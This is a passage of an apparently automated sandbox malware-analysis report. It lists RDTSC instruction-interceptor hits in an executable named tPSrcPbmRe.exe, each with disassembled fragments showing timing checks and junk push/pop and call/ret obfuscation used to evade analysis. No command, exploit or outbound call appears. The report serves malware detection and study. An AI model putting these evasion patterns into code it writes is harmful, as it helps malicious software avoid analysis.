                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9D9FF second address: C9DA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9DA03 second address: C9DA1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C81394C06h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9FA43 second address: C9FA48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9FA48 second address: C9FA52 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9C81394BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9992F second address: C99933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C99933 second address: C99947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C99947 second address: C99951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F9C80FB5666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9A8A5 second address: C9A8AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9A8AC second address: C9A91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ebx 0x00000010 nop 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov edi, dword ptr [ebp+1247BFA5h] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F9C80FB5668h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov ebx, esi 0x00000041 mov eax, dword ptr [ebp+122D14E9h] 0x00000047 pushad 0x00000048 xor bh, 00000000h 0x0000004b mov esi, dword ptr [ebp+122D39A5h] 0x00000051 popad 0x00000052 push FFFFFFFFh 0x00000054 mov dword ptr [ebp+122D2719h], eax 0x0000005a add ebx, 6D291D72h 0x00000060 push eax 0x00000061 pushad 0x00000062 je 00007F9C80FB566Ch 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9DBB7 second address: C9DBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C988D7 second address: C988DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9EA88 second address: C9EA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9EA8C second address: C9EA92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9EB72 second address: C9EB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9C81394C06h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9EB8F second address: C9EB93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9FBC1 second address: C9FC09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F9C81394BFDh 0x0000000e popad 0x0000000f push eax 0x00000010 jbe 00007F9C81394C17h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F9C81394C05h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9FC09 second address: C9FC0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CA61B5 second address: CA61C1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9C81394BFEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CA61C1 second address: CA61CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9C80FB566Eh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CA647C second address: CA6496 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9C81394BFAh 0x00000008 js 00007F9C81394BF6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CA8046 second address: CA804D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CA804D second address: CA8053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C40298 second address: C402C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F9C80FB5676h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C4A4F2 second address: C4A525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 jl 00007F9C81394C27h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9C81394C06h 0x00000013 jmp 00007F9C81394BFFh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADA76 second address: CADA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADA7B second address: CADA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADA81 second address: CADA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADB2B second address: CADB31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADB31 second address: CADB47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB566Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADB47 second address: CADB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F9C81394C09h 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jbe 00007F9C81394C04h 0x00000019 pushad 0x0000001a jg 00007F9C81394BF6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADB7D second address: CADB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADB89 second address: CADB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB43C3 second address: CB43C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB43C9 second address: CB43CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB43CE second address: CB43D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB3831 second address: CB3839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB3C01 second address: CB3C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB3C05 second address: CB3C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB3D1B second address: CB3D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB3D21 second address: CB3D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9C81394BF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB662C second address: CB6632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB6632 second address: CB6653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9C81394C03h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jp 00007F9C81394BF6h 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB6653 second address: CB6659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB6659 second address: CB665D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9BF5 second address: CB9C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9C00 second address: CB9C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9C04 second address: CB9C1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5671h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9C1B second address: CB9C23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9C23 second address: CB9C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9C27 second address: CB9C39 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F9C81394BF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81753 second address: C81757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81757 second address: C8181B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jp 00007F9C81394BF6h 0x00000013 jmp 00007F9C81394BFFh 0x00000018 popad 0x00000019 jmp 00007F9C81394C04h 0x0000001e popad 0x0000001f nop 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F9C81394BF8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a jmp 00007F9C81394C00h 0x0000003f lea eax, dword ptr [ebp+1247D4D6h] 0x00000045 push 00000000h 0x00000047 push ecx 0x00000048 call 00007F9C81394BF8h 0x0000004d pop ecx 0x0000004e mov dword ptr [esp+04h], ecx 0x00000052 add dword ptr [esp+04h], 00000015h 0x0000005a inc ecx 0x0000005b push ecx 0x0000005c ret 0x0000005d pop ecx 0x0000005e ret 0x0000005f call 00007F9C81394C02h 0x00000064 mov dword ptr [ebp+122D2FA8h], ecx 0x0000006a pop edx 0x0000006b nop 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f jnc 00007F9C81394BF6h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81A17 second address: C81A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81A1B second address: C81A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81D93 second address: C81D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81D97 second address: C81D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81D9D second address: C81DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81E94 second address: C81E9E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81E9E second address: C81EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81EA4 second address: C81EFF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 2484F71Ah 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F9C81394BF8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d pushad 0x0000002e call 00007F9C81394BFAh 0x00000033 mov dl, DEh 0x00000035 pop ebx 0x00000036 ja 00007F9C81394BFCh 0x0000003c popad 0x0000003d call 00007F9C81394BF9h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 pop eax 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81EFF second address: C81F05 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81F05 second address: C81F40 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007F9C81394C08h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F9C81394C00h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82049 second address: C8204F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8204F second address: C82053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C820BF second address: C820CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C820CB second address: C820CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C820CF second address: C820D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82189 second address: C8218E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8218E second address: C82199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F9C80FB5666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82199 second address: C821B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F9C81394BFAh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C821B5 second address: C821BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C821BB second address: C821CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C81394BFFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C821CE second address: C821D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C821D2 second address: C821F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jg 00007F9C81394C00h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ebx 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8227E second address: C822B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F9C80FB5676h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8276C second address: C82770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82770 second address: C82776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82A86 second address: C82ACA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push ebx 0x0000000f jo 00007F9C81394BF6h 0x00000015 pop ebx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jmp 00007F9C81394BFEh 0x0000001f push eax 0x00000020 push edx 0x00000021 jne 00007F9C81394BF6h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82ACA second address: C82ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82ACE second address: C82AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F9C81394BFCh 0x00000013 js 00007F9C81394BF6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82B60 second address: C82B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82B66 second address: C82B73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82B73 second address: C82BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F9C80FB5668h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 clc 0x00000022 lea eax, dword ptr [ebp+1247D51Ah] 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F9C80FB5668h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 mov cx, 864Bh 0x00000046 nop 0x00000047 jmp 00007F9C80FB566Bh 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F9C80FB5676h 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82BF1 second address: C82BFB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82BFB second address: C82C61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9C80FB5674h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F9C80FB5677h 0x00000011 lea eax, dword ptr [ebp+1247D4D6h] 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F9C80FB5668h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D1DCCh], ecx 0x00000037 nop 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82C61 second address: C82C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
